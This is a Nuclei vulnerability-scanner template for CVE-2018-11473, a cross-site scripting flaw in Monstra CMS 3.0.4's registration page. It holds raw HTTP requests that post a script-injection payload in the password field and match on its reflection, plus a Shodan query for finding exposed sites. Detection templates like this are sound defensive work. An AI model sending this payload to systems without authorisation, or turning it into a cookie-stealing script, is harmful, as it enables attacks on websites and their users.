nuclei-templates/http/cves/2018/CVE-2018-11473.yaml

73 lines
2.6 KiB
YAML
Raw Normal View History

2023-01-09 05:47:56 +00:00
id: CVE-2018-11473
info:
name: Monstra CMS 3.0.4 - Cross-Site Scripting
2023-01-09 05:47:56 +00:00
author: ritikchaddha
severity: medium
description: |
Monstra CMS 3.0.4 contains a cross-site scripting vulnerability via the registration form (i.e., the login parameter to users/registration). An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:57:14 +00:00
remediation: |
Upgrade to the latest version of Monstra CMS or apply the vendor-provided patch to fix the XSS vulnerability.
2023-01-09 05:47:56 +00:00
reference:
- https://github.com/monstra-cms/monstra/issues/446
- https://github.com/nikhil1232/Monstra-CMS-3.0.4-XSS-ON-Registration-Page
- https://nvd.nist.gov/vuln/detail/CVE-2018-11473
- https://github.com/ARPSyndicate/kenzer-templates
2023-01-09 05:47:56 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2023-01-09 05:47:56 +00:00
cve-id: CVE-2018-11473
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.00097
epss-percentile: 0.39534
2023-09-06 12:57:14 +00:00
cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:*
2023-01-09 05:47:56 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:57:14 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: monstra
product: monstra
2023-09-06 12:57:14 +00:00
shodan-query: http.favicon.hash:419828698
2023-12-05 09:50:33 +00:00
tags: cve,cve2018,xss,mostra,mostracms,cms,monstra
2023-01-09 05:47:56 +00:00
http:
2023-01-09 05:47:56 +00:00
- raw:
- |
GET /users/registration HTTP/1.1
Host: {{Hostname}}
- |
POST /users/registration HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test&register=Register
matchers-condition: and
matchers:
- type: word
part: body
words:
- "><script>alert(document.domain)</script>"
- "Monstra"
case-insensitive: true
2023-07-11 19:49:27 +00:00
condition: and
2023-01-09 05:47:56 +00:00
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
extractors:
- type: regex
name: csrf
group: 1
regex:
- 'id="csrf" name="csrf" value="(.*)">'
internal: true
2023-07-11 19:49:27 +00:00
part: body
# digest: 490a004630440220740d343390daffdaa2e4889d6c8f3c60262ea0f8dfefa267015b150d60eb9c46022072f2d72c1ca4e16ec3ce633cf0ad2ae4a154180871ea90d771a74a50410a9bfb:922c64590222798bb761d5b6d8e72950